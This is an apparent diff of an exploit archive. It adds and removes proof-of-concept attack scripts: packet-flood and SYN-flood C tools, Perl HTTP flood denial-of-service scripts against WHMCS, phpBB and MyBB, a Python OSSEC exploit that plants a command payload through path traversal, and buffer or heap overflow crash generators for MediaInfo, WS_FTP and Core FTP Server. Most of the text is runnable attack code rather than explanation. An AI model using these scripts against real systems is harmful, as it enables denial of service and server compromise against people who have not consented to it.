-              fprintf(stderr,"Can't resolve source address.\n");
-              exit(1);
-	  }
-            break;
-	default:
-            usage(argv[0]);
-            break;
-        }
-      }
-      srandom((unsigned)(time((time_t)0)));
-      if (!count) count=COUNT;
-      fprintf(stderr,"Sending oversized packets:\nFrom: ");
-      if (!src_ip) fprintf(stderr,"       (random)"); else {
-        addr.s_addr = src_ip;
-        fprintf(stderr,"%15s",inet_ntoa(addr));
-      }
-      addr.s_addr = dst_ip;
-      fprintf(stderr,"\n  To: %15s\n",inet_ntoa(addr));
-      fprintf(stderr," Amt: %5d\n",count);
-      fprintf(stderr,"[ ");
-      for (i=0;i<count;i++) {
-        if (!src_ip) send_frags(rip_sock,rand(),dst_ip,rand(),rand()); else
-          send_frags(rip_sock,src_ip,dst_ip,rand(),rand());
-        fprintf(stderr, "b00z ");
-        usleep(500);
-      }
-      fprintf(stderr, "]\n");
-      return (0);
-}
--- a/platforms/linux/remote/19458.c
+++ b/platforms/linux/remote/19458.c
@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/580/info

 Certain Linux kernels in the 2.0.3x range are susceptible to blind TCP spoofing attacks due to the way that the kernel handles invalid ack sequence numbers, and the way it assigns IDs to outgoing IP datagrams. For this vulnerability to be effective, 3 conditions have to be met: The spoofed machine must be off the network or incapable of sending data out/recieving data properly, the target machine must not be communicating actively with any other machines at the time, and no packets between the attacker's machine and the target can be dropped during the attack.
@ -5,6 +6,7 @@ Certain Linux kernels in the 2.0.3x range are susceptible to blind TCP spoofing
 The reason this can be done is firstly due to how these kernels handle invalid ack_seq numbers. If a connection has not been established, a packet with an ack_seq too low will be ignored, and a packet with an ack_seq too high will be responded to with a reset packet. If a connection has been established, any invalid ack_seq is ignored. Whether or not a reply packet has been generated can be determined by sending ICMP echo requests, with the attacker's real IP address as the source. Linux assigns sequnetial IP IDs to all outgoing packets. Therefore, by sending an ICMP echo request probe between each spoofed packet, it is possible to determine how many packets were generated in reply to the spoof attempt.

 Therefore: ICMP echo request is sent, and reply received with id=i. If a spoof attempt is made with ack_seq = a, and the next ICMP reply has an id of i+1, then no reply was generated from the spoof attempt and ack_seq is too low. However, if the ICMP reply has an id of i+2, then a response was generated and ack_seq is either too high, (reset packet sent by target) or correct (connection established). To determine which is true, another spoofed packet is sent, with a known-high ack_seq, followed by another ICMP probe. If the response to this probe has an ID incremented by two, then the known-high ack_seq resulted in a reset packet being sent, so the connection has not been successfully established. If the ICMP reply has an ID incremented by one, the known-high ack_seq was ignored, meaning that the connection has been established and the blind spoof can continue. 
+*/

 /* by Nergal */

--- a/platforms/linux/remote/20765.pl
+++ b/platforms/linux/remote/20765.pl
@ -1,12 +1,13 @@
-source: http://www.securityfocus.com/bid/2602/info
-
-The Linux kernel includes a built-in firewall implementation called IPTables. IPTables supports stateful inspection of several application protocols, one of which is FTP. The inspection is used to facilitate outgoing PORT connections for FTP data transfers when clients or servers are behind firewalls.
-
-When a FTP PORT command containing an IP address which differs from the client's is processed by the stateful-inspection module, the occurrance is caught. Despite being detected, the condition is handled erroneously causing an entry for the PORT connection to be inserted into the table of 'RELATED' connections. This temporarily permits traffic through the firewall from the FTP server to the destination included in the PORT command.
-
-An attacker may be able to use this vulnerability to access unauthorized hosts from the FTP server.
-
-It should be noted that clients do not need to authenticate to exploit this vulnerability. 
+# source: http://www.securityfocus.com/bid/2602/info
+#
+# The Linux kernel includes a built-in firewall implementation called IPTables. IPTables supports stateful inspection of several application protocols, one of which is FTP. The inspection is used to facilitate outgoing PORT connections for FTP data transfers when clients or servers are behind firewalls.
+#
+# When a FTP PORT command containing an IP address which differs from the client's is processed by the stateful-inspection module, the occurrance is caught. Despite being detected, the condition is handled erroneously causing an entry for the PORT connection to be inserted into the table of 'RELATED' connections. This temporarily permits traffic through the firewall from the FTP server to the destination included in the PORT command.
+#
+# An attacker may be able to use this vulnerability to access unauthorized hosts from the FTP server.
+#
+# It should be noted that clients do not need to authenticate to exploit this vulnerability. 
+#

 #!/usr/bin/perl
 #
@ -96,7 +97,3 @@ out(1," - RECV: $buf\n");
 out(0," * $server should now be able to connect to $host on port $port ! (for the next 10 seconds)\n");
 out(0," - Closing connection to $server:$serverport.\n\n");
 close(Sock);
-
-
-
-
--- a/platforms/linux/remote/24696.c
+++ b/platforms/linux/remote/24696.c
@ -1,229 +0,0 @@
-source: http://www.securityfocus.com/bid/11488/info
-
-It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch.
-
-A remote attacker may exploit this vulnerability to crash a computer that is running the affected kernel.
-
-The 2.6 Linux kernel is reported prone to this vulnerability, the 2.4 kernel is not reported to be vulnerable.
-
-/* 
-* 
-* iptables.log.integer.underflow.POC.c 
-* 
-* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)
-*
-* felix__zhou _at_ hotmail _dot_ com
-*
-* */
-
-#include <stdio.h>
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <time.h>
-
-#pragma comment(lib,"ws2_32")
-
-static unsigned char dip[4];
-static unsigned int da;
-static unsigned short dp;
-static unsigned char dport[2];
-
-static unsigned char sip[4];
-static unsigned int sa;
-static unsigned short sp;
-static unsigned char sport[2];
-
-/*
-static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)
-{
-unsigned int csum = 0;
-unsigned char *p = ip;
-
-while (1 < size) {
-csum += (p[0] << 8) + p[1];
-p += 2;
-size -= 2;
-}
-
-if (size) 
-csum += *p;
-
-csum = (csum >> 16) + (csum & 0xffff);
-csum += (csum >> 16);
-
-sum[0] = (((unsigned short)(~csum)) >> 8);
-sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
-}
-*/
-
-static void tcp_csum(unsigned char *tcp, unsigned char *ip, 
-unsigned int size, unsigned char *sum)
-{
-unsigned int csum = 0;
-unsigned char *p = tcp;
-
-while (1 < size) {
-csum += (p[0] << 8) + p[1];
-p += 2;
-size -= 2;
-}
-
-csum += (ip[12] << 8) + ip[13];
-csum += (ip[14] << 8) + ip[15];
-
-csum += (ip[16] << 8) + ip[17];
-csum += (ip[18] << 8) + ip[19];
-
-csum += 0x06;
-csum += 0x14;
-
-if (size) 
-csum += *p;
-
-csum = (csum >> 16) + (csum & 0xffff);
-csum += (csum >> 16);
-
-sum[0] = (((unsigned short)(~csum)) >> 8);
-sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
-}
-
-static int work(SOCKET s)
-{
-DWORD ret = 1;
-unsigned char buf[1500];
-unsigned char *ip;
-unsigned char *tcp;
-unsigned int seq = 0x01;
-struct sockaddr_in host;
-
-ZeroMemory(buf, 1500);
-
-ip = buf;
-tcp = buf + 20;
-
-ip[0] = 0x45; /* ver & hlen */
-ip[3] = 0x28; /* tlen */
-ip[8] = 0x80; /* ttl */
-ip[9] = 0x06; /* protocol */
-ip[10] = ip[11] = 0;
-ip[12] = sip[0]; /* saddr */
-ip[13] = sip[1];
-ip[14] = sip[2];
-ip[15] = sip[3];
-ip[16] = dip[0]; /* daddr */
-ip[17] = dip[1];
-ip[18] = dip[2];
-ip[19] = dip[3];
-
-tcp[0] = sport[0];
-tcp[1] = sport[1];
-tcp[2] = dport[0]; /* dport */
-tcp[3] = dport[1];
-tcp[12] = 0x40; /* hlen */ /* HERE */
-tcp[13] = 0x02; /* flags */
-
-ZeroMemory(&host, sizeof(struct sockaddr_in));
-host.sin_family = AF_INET;
-host.sin_port = dp;
-host.sin_addr.s_addr = da;
-
-for (;; ) {
-tcp[4] = (seq >> 24); /* seq number */
-tcp[5] = ((seq << 8) >> 24);
-tcp[6] = ((seq << 16) >> 24);
-tcp[7] = ((seq << 24) >> 24);
-tcp[16] = tcp[17] = 0;
-seq ++;
-
-tcp_csum(tcp, ip, 0x14, tcp + 16);
-
-if (SOCKET_ERROR == sendto(s, buf, 0x28, 0, 
-(SOCKADDR *)&(host), sizeof host)) {
-if (WSAEACCES != WSAGetLastError()) {
-printf("sendto() failed: %d\n", 
-WSAGetLastError());
-
-ret = 1;
-} else {
-printf("You must be Administrator!\n");
-}
-
-break;
-}
-}
-
-return ret;
-}
-
-static char usage[] = "Usage: %s dip dport sip sport\n";
-
-int main(int argc, char **argv)
-{
-WORD ver = MAKEWORD(2, 2);
-WSADATA data;
-unsigned char *p;
-SOCKET s;
-int ret = 1;
-BOOL eopt = TRUE;
-
-if (5 != argc) {
-printf(usage, argv[0]);
-goto out;
-}
-
-if (INADDR_NONE == (da = inet_addr(argv[1]))) {
-printf("dest ip address is NOT valid!\n");
-printf(usage, argv[0]);
-goto out;
-}
-
-p = (unsigned char *)&da;
-dip[0] = p[0];
-dip[1] = p[1];
-dip[2] = p[2];
-dip[3] = p[3];
-
-dp = atoi(argv[2]);
-dport[0] = ((dp << 16) >> 24);
-dport[1] = ((dp << 24) >> 24);
-
-if (INADDR_NONE == (sa = inet_addr(argv[3]))) {
-printf("source ip address is NOT valid!\n");
-printf(usage, argv[3]);
-goto out;
-}
-
-p = (unsigned char *)&sa;
-sip[0] = p[0];
-sip[1] = p[1];
-sip[2] = p[2];
-sip[3] = p[3];
-
-sp = atoi(argv[4]);
-sport[0] = ((sp << 16) >> 24);
-sport[1] = ((sp << 24) >> 24);
-
-srand((unsigned int)time(0));
-
-if (WSAStartup(ver, &data)) {
-printf("WSAStartup() failed\n");
-goto out;
-}
-
-if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0))) 
-goto err;
-
-if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL, 
-(char *)&eopt, sizeof(eopt)))
-goto err1;
-
-work(s);
-
-err1:
-closesocket(s);
-err:
-WSACleanup();
-
-out:
-return ret;
-}
--- a/platforms/multiple/dos/39799.txt
+++ b/platforms/multiple/dos/39799.txt
@ -0,0 +1,49 @@
+########################################################################################
+  
+# Title: Adobe Reader DC <= 15.010.20060 - Memory corruption
+# Application: Adobe Reader DC
+# Version: 15.010.20060 and earlier versions
+# Platform: Windows and Macintosh
+# Software Link: https://acrobat.adobe.com/ca/fr/acrobat/pdf-reader.html
+# Date: May 10, 2016
+# CVE: CVE-2016-1077
+# Author: Pier-Luc Maltais from COSIG
+# Contact: https://twitter.com/COSIG_
+# Personal contact: https://twitter.com/plmaltais
+  
+########################################################################################
+  
+===================
+Introduction:
+===================
+ More powerful than other PDF software, Adobe Acrobat Reader DC is the free, trusted 
+ standard for viewing, printing and annotating PDFs. And now, it’s connected to Adobe 
+ Document Cloud — so it’s easier than ever to work with PDFs on computers and mobile 
+ devices. (https://acrobat.adobe.com/ca/en/acrobat/pdf-reader.html)
+ 
+########################################################################################
+  
+===================
+Report Timeline:
+===================
+ 2016-02-04: Pier-Luc Maltais from COSIG found the issue and report it to Adobe PSIRT.
+ 2016-05-10: Vendor fixed the issue (APSB16-14).
+ 2016-03-08: Release of this advisory.
+ 
+########################################################################################
+  
+===================
+Technical details:
+===================
+ A memory corruption occurs when Adobe Reader DC handle a specially crafted image 
+ XObject, which could lead to remote code execution.
+  
+########################################################################################
+  
+==========
+POC:
+==========
+https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-14_PoC.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39799.zip
+  
+########################################################################################
--- a/platforms/php/webapps/37728.py
+++ b/platforms/php/webapps/37728.py
@ -1,71 +0,0 @@
-###########################################################
-# Exploit Title: [OSSEC]
-# Date: [2015-08-01]
-# Exploit Author: [Milad Saber]
-# Vendor Homepage: [www.ossec.net]
-# Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz]
-# Version: [0.8]
-# Tested on: [OSSEC Manager]
-# Exploit for DOS ossec server.
-# Please install ossec server and WUI 0.8 and run this exploit
-##########################################################
-import socket
-import sys
-import time
- 
-# specify payload
-payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root
-user = 'root'
-pwd = 'var'
- 
-if len(sys.argv) != 2:
-    sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0])
-    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0])
-    sys.exit(1)
- 
-ip = sys.argv[1]
- 
-def recv(s):
-        s.recv(1024)
-        time.sleep(0.2)
- 
-try:
-    print "[+]Connecting to milad exploit ..."
-    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-    s.connect((ip,4555))
-    s.recv(1024)
-    s.send(user + "\n")
-    s.recv(1024)
-    s.send(pwd + "\n")
-    s.recv(1024)
-    print "[+]Creating user..."
-    s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n")
-    s.recv(1024)
-    s.send("quit\n")
-    s.close()
- 
-    print "[+]Connecting to SMTP server..."
-    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-    s.connect((ip,25,80))
-    s.send("hello milad@milad.pl\r\n")
-    recv(s)
-    print "[+]Sending payload..."
-    s.send("mail from: <'@milad.pl>\r\n")
-    recv(s)
-    # also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found
-    s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n")
-    recv(s)
-    s.send("data\r\n")
-    recv(s)
-    s.send("From: milad@milad.pl\r\n")
-    s.send("\r\n")
-    s.send("'\n")
-    s.send(payload + "\n")
-    s.send("\r\n.\r\n")
-    recv(s)
-    s.send("quit\r\n")
-    recv(s)
-    s.close()
-    print "[+]Done! Payload will be executed once somebody logs in."
-except:
-    print "Connection failed."
--- a/platforms/php/webapps/39091.pl
+++ b/platforms/php/webapps/39091.pl
@ -1,80 +0,0 @@
-source: http://www.securityfocus.com/bid/65470/info
-
-WHMCS is prone to a denial-of-service vulnerability.
-
-Successful exploits may allow attackers to cause denial-of-service condition, denying service to legitimate users.
-
-WHMCS 5.12 is vulnerable; other versions may also be affected. 
-
-#!/usr/bin/perl
-#################################
-#
-#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
-#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
-#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
-#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
-#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
-#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
-#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
-#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
-#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
-#
-#####################################
-#####################################
-#         Iranian Exploit DataBase
-# WHMCS Denial of Service Vulnerability
-# Test on Whmcs 5.12
-# Vendor site : www.whmcs.com
-# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () yahoo com
-# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir
-# Fb Page : https://www.facebook.com/iedb.ir
-# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR  - F () riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day
-# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker
-# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini
-# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
-#####################################
-use Socket;
-if (@ARGV < 2) { &usage }
-$rand=rand(10);
-$host = $ARGV[0];
-$dir = $ARGV[1];
-$host =~ s/(http:\/\/)//eg;
-for ($i=0; $i<10; $i--)
-{
-$data = "ajax=1&a=domainoptions&sld=saddddd&tld=saasssssssssss&checktype=owndomain";
-$len = length $data;
-$foo = "POST ".$dir."cart.php HTTP/1.1\r\n".
-"Accept: * /*\r\n".
-"Accept-Language: en-gb\r\n".
-"Content-Type: application/x-www-form-urlencoded\r\n".
-"Accept-Encoding: gzip, deflate\r\n".
-"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
-"Host: $host\r\n".
-"Content-Length: $len\r\n".
-"Connection: Keep-Alive\r\n".
-"Cache-Control: no-cache\r\n\r\n".
-"$data";
-my $port = "80";
-my $proto = getprotobyname('tcp');
-socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
-connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
-send(SOCKET,"$foo", 0);
-syswrite STDOUT, "+" ;
-}
-print "\n\n";
-system('ping $host');
-sub usage {
-print "################################################# \n";
-print "##       WHMCS Denial of Service Vulnerability\n";
-print "## Discoverd By Amir - iedb.team () gmail com - Id : o0_shabgard_0o \n";
-print "##      Www.IeDb.Ir/acc   -   Www.IrIsT.Ir \n";
-print "################################################# \n";
-print "## [host] [path] \n";
-print "## http://host.com /whmcs/\n";
-print "################################################# \n";
-exit();
-};
-#####################################
-#  Archive Exploit = http://www.iedb.ir/exploits-1300.html
-#####################################
-
--- a/platforms/php/webapps/39092.pl
+++ b/platforms/php/webapps/39092.pl
@ -1,79 +0,0 @@
-source: http://www.securityfocus.com/bid/65481/info
-
-phpBB is prone to a remote denial-of-service vulnerability.
-
-An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
-
-###########################
-
-# Phpbb Forum Denial of Service Vulnerability
-
-###########################
-
-#!/usr/bin/perl
-# Iranian Exploit DataBase
-# Phpbb Forum Denial of Service Vulnerability
-# Version: All Version
-# Vendor site : http://www.phpbb.com
-# Code Written By Amir - iedb.team@gmail.com - o0_iedb_0o@yahoo.com
-# Site : Www.IeDb.Ir   -   Www.IrIsT.Ir
-# Fb Page : 
-https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
-# Greats : TaK.FaNaR - ErfanMs - Medrik - F@riD - Bl4ck M4n - 0x0ptim0us 
- 0Day - Dj.TiniVini - E2MA3N 
-#  l4tr0d3ctism - H-SK33PY - Noter - r3d_s0urc3 - Dr_Evil And All 
-Members In IeDb.Ir/acc
-#####################################
-use Socket;
-if (@ARGV < 2) { &usage }
-$rand=rand(10);
-$host = $ARGV[0];
-$dir = $ARGV[1];
-$host =~ s/(http:\/\/)//eg;
-for ($i=0; $i<10; $i--)
-{
-$data = 
-"securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0";
-$len = length $data;
-$foo = "POST ".$dir."search.php?do=process HTTP/1.1\r\n".
-"Accept: * /*\r\n".
-"Accept-Language: en-gb\r\n".
-"Content-Type: application/x-www-form-urlencoded\r\n".
-"Accept-Encoding: gzip, deflate\r\n".
-"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
-"Host: $host\r\n".
-"Content-Length: $len\r\n".
-"Connection: Keep-Alive\r\n".
-"Cache-Control: no-cache\r\n\r\n".
-"$data";
-my $port = "80";
-my $proto = getprotobyname('tcp');
-socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
-connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
-send(SOCKET,"$foo", 0);
-syswrite STDOUT, "+" ;
-}
-print "\n\n";
-system('ping $host');
-sub usage {
-print "\n";
-print "################################################# \n";
-print "##       Phpbb Forum Denial of Service Vulnerability\n";
-print "## Discoverd By Amir - iedb.team@gmail.com - Id : o0_iedb_0o \n";
-print "##            Www.IeDb.Ir   -   Www.IrIsT.Ir \n";
-print "################################################# \n";
-print "## [host] [path] \n";
-print "## http://host.com /forum/\n";
-print "################################################# \n";
-print "\n";
-exit();
-};
-#####################################
-#  Archive Exploit = http://www.iedb.ir/exploits-868.html
-#####################################
-
-###########################
-
-# Iranian Exploit DataBase = http://IeDb.Ir [2013-11-17]
-
-###########################
--- a/platforms/php/webapps/39095.pl
+++ b/platforms/php/webapps/39095.pl
@ -1,82 +0,0 @@
-source: http://www.securityfocus.com/bid/65545/info
-
-MyBB is prone to a remote denial-of-service vulnerability.
-
-An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
-
-MyBB 1.6.12 is vulnerable; other versions may be also be affected. 
-
-
-
-# Mybb All Version Denial of Service Vulnerability
-
-#!/usr/bin/perl
-
-# Iranian Exploit DataBase
-# Mybb All Version Denial of Service Vulnerability
-# Test on Mybb 1.6.12
-# Vendor site : www.mybb.com
-# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () 
-yahoo com
-# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir
-# Fb Page : https://www.facebook.com/iedb.ir
-# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR  - F () riD - N20 - 
-Bl4ck N3T - 0x0ptim0us - 0Day
-# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - 
-z3r0 - Mr.Zer0 - one alone hacker
-# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam 
-Vanda - C0dex - Dj.TiniVini
-# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
-#####################################
-use Socket;
-if (@ARGV < 2) { &usage }
-$rand=rand(10);
-$host = $ARGV[0];
-$dir = $ARGV[1];
-$host =~ s/(http:\/\/)//eg;
-for ($i=0; $i<10; $i--)
-{
-$data = 
-"forums%5B%5D=all&version=rss2.0&limit=1500000&make=%D8%AF%D8%B1%DB%8C%D8%A7%D9%81%D8%AA+%D9%84%DB%8C%D9%86%DA%A9+%D9%BE%DB%8C%D9%88%D9%86%D8%AF+%D8%B3%D8%A7%DB%8C%D8%AA%DB%8C";
-$len = length $data;
-$foo = "POST ".$dir."misc.php?action=syndication HTTP/1.1\r\n".
-"Accept: * /*\r\n".
-"Accept-Language: en-gb\r\n".
-"Content-Type: application/x-www-form-urlencoded\r\n".
-"Accept-Encoding: gzip, deflate\r\n".
-"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
-"Host: $host\r\n".
-"Content-Length: $len\r\n".
-"Connection: Keep-Alive\r\n".
-"Cache-Control: no-cache\r\n\r\n".
-"$data";
-my $port = "80";
-my $proto = getprotobyname('tcp');
-socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
-connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
-send(SOCKET,"$foo", 0);
-syswrite STDOUT, "+" ;
-}
-print "\n\n";
-system('ping $host');
-sub usage {
-print "################################################# \n";
-print "##       Mybb All Version Denial of Service Vulnerability\n";
-print "## Discoverd By Amir - iedb.team () gmail com - Id : 
-o0_shabgard_0o \n";
-print "##      Www.IeDb.Ir/acc   -   Www.IrIsT.Ir \n";
-print "################################################# \n";
-print "## [host] [path] \n";
-print "## http://host.com /mybb/\n";
-print "################################################# \n";
-exit();
-};
-#####################################
-#  Archive Exploit = http://www.iedb.ir/exploits-1332.html
-#####################################
-
-###########################
-
-# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-12]
-
-###########################
--- a/platforms/windows/dos/39795.pl
+++ b/platforms/windows/dos/39795.pl
@ -0,0 +1,28 @@
+#!/usr/bin/perl -w
+# Title : Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit
+# Tested on Windows 7 / Server 2008
+# Download Link : https://sourceforge.net/projects/mediainfo/files/binary/mediainfo-gui/0.7.61/
+#
+#
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   reza.espargham@owasp.org
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/reza.espargham
+#
+# Github : github.com/rezasp
+#
+#
+#
+# 1 . run perl code : perl reza.pl
+# 2 . open 1.mp3 by mediainfo.exe
+# 3 . Crashed ;)
+
+use MP3::Tag;
+
+$mp3 = MP3::Tag->new('1.mp3');
+$mp3->title_set('A' x 500000);
+$mp3->artist_set('A' x 500000);
+$mp3->update_tags();  
+$mp3->close();
--- a/platforms/windows/dos/39796.py
+++ b/platforms/windows/dos/39796.py
@ -0,0 +1,25 @@
+#!/usr/bin/python
+#Author: Zahid Adeel
+#Author Email: exploiter.zee@gmail.com
+#Title: Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC
+#Vendor Homepage: http://www.wsftple.com/ 
+#Software Link: http://www.wsftple.com/download.aspx
+#Version: LE 12.3
+#Tested on: Windows 8.1 x64 Pro
+#Date: 2016-05-10
+
+#Steps:
+#Run WS_FTP LE client, Navigate to "Local Search" option in the Tools menu, paste the contents of wsftple-poc.txt in search field and press Enter.
+
+fname="wsftple-poc.txt"
+
+junk = "A" * 840
+n_seh = "BBBB"
+seh = "CCCC"
+
+padding = "F" * (1000 - len(junk) - 8)
+poc = junk + n_seh + ppr + padding
+
+fhandle = open(fname , 'wb')
+fhandle.write(poc)
+fhandle.close()
--- a/platforms/windows/dos/39797.py
+++ b/platforms/windows/dos/39797.py
@ -0,0 +1,122 @@
+# -*- coding: cp1252 -*-
+# Exploit Title: Core FTP Server 32-bit - Build 587 Heap Overflow
+# Date: 05/10/2016
+# Exploit Author: Paul Purcell
+# Contact: ptpxploit at gmail
+# Vendor Homepage: http://www.coreftp.com/
+# Vulnerable Version Download:  http://coreftp.com/server/download/archive/CoreFTPServer587.exe
+# Version: Core FTP Server 32-bit - Build 587 32-bit
+# Tested on: Windows XP SP3 x32 English, Windows 7 Pro x64 SP1 English, Windows 10 Pro x64 English
+# Category: Remote Heap Overflow PoC
+#
+# Timeline: 03/03/16 Bug found
+#           03/04/16 Vender notified
+#           03/06/16 Vender replied acknowledging the issue
+#           04/07/16 Vender releases Build 588 which fixes the issue.
+#           05/10/16 Exploit Released
+#
+# Summary:  This exploit allows for a post authentication DOS.  The server does not do proper bounds checking on
+#           server responses.  In this case, the long 'MODE set to ...' reply invoked by a long TYPE command
+#           causes a heap overflow and crashes the server process.
+#
+#           Crash info:
+#
+#           0133FA2C  32 30 30 20 4D 4F 44 45  200 MODE
+#           0133FA34  20 73 65 74 20 74 6F 20   set to
+#           0133FA3C  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA44  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA4C  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA54  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA5C  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA64  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA6C  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA74  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA7C  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA84  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA8C  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA94  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FA9C  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAA4  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAAC  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAB4  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FABC  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAC4  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FACC  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAD4  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FADC  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAE4  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAEC  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAF4  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FAFC  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FB04  41 41 41 41 41 41 41 41  AAAAAAAA
+#           0133FB0C  58 02 00 00 8E EB 31 57  X..Žë1W
+#
+#           00439827   . 8B86 3C040000  MOV EAX,DWORD PTR DS:[ESI+43C]           ;  ESI invalid address: DS:[4141457D]=???
+#           0043982D   . 85C0           TEST EAX,EAX
+#
+#           DS:[4141457D]=???
+#           EAX=00000000
+#
+#           EAX 00000000
+#           ECX 00000000
+#           EDX 00000001
+#           EBX 01141B90
+#           ESP 0142C06C
+#           EBP 0143FB3C
+#           ESI 41414141
+#           EDI 00000000
+#           EIP 00439827 coresrvr.00439827
+#           C 1  ES 0023 32bit 0(FFFFFFFF)
+#           P 1  CS 001B 32bit 0(FFFFFFFF)
+#           A 1  SS 0023 32bit 0(FFFFFFFF)
+#           Z 0  DS 0023 32bit 0(FFFFFFFF)
+#           S 1  FS 003B 32bit 7FFD8000(FFF)
+#           T 1  GS 0000 NULL
+#           D 0
+#           O 0  LastErr ERROR_SUCCESS (00000000)
+#           EFL 00000397 (NO,B,NE,BE,S,PE,L,LE)
+#           ST0 empty
+#           ST1 empty
+#           ST2 empty
+#           ST3 empty
+#           ST4 empty
+#           ST5 empty
+#           ST6 empty
+#           ST7 empty
+#                          3 2 1 0      E S P U O Z D I
+#           FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
+#           FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
+
+import time
+import socket
+from ftplib import FTP
+
+host='yourhost'             #host or IP
+port=21                     #port
+u="youruser"                #username
+p="yourpass"                #password
+pause=3                     #pause between login & command attempts, normally 3 seconds is plenty of time.
+command="TYPE "
+evil="A"*211                #Any more, and the program warns of buffer overflow attempt and ignores the command
+evilTYPE=(command+evil)     #Evil type command
+
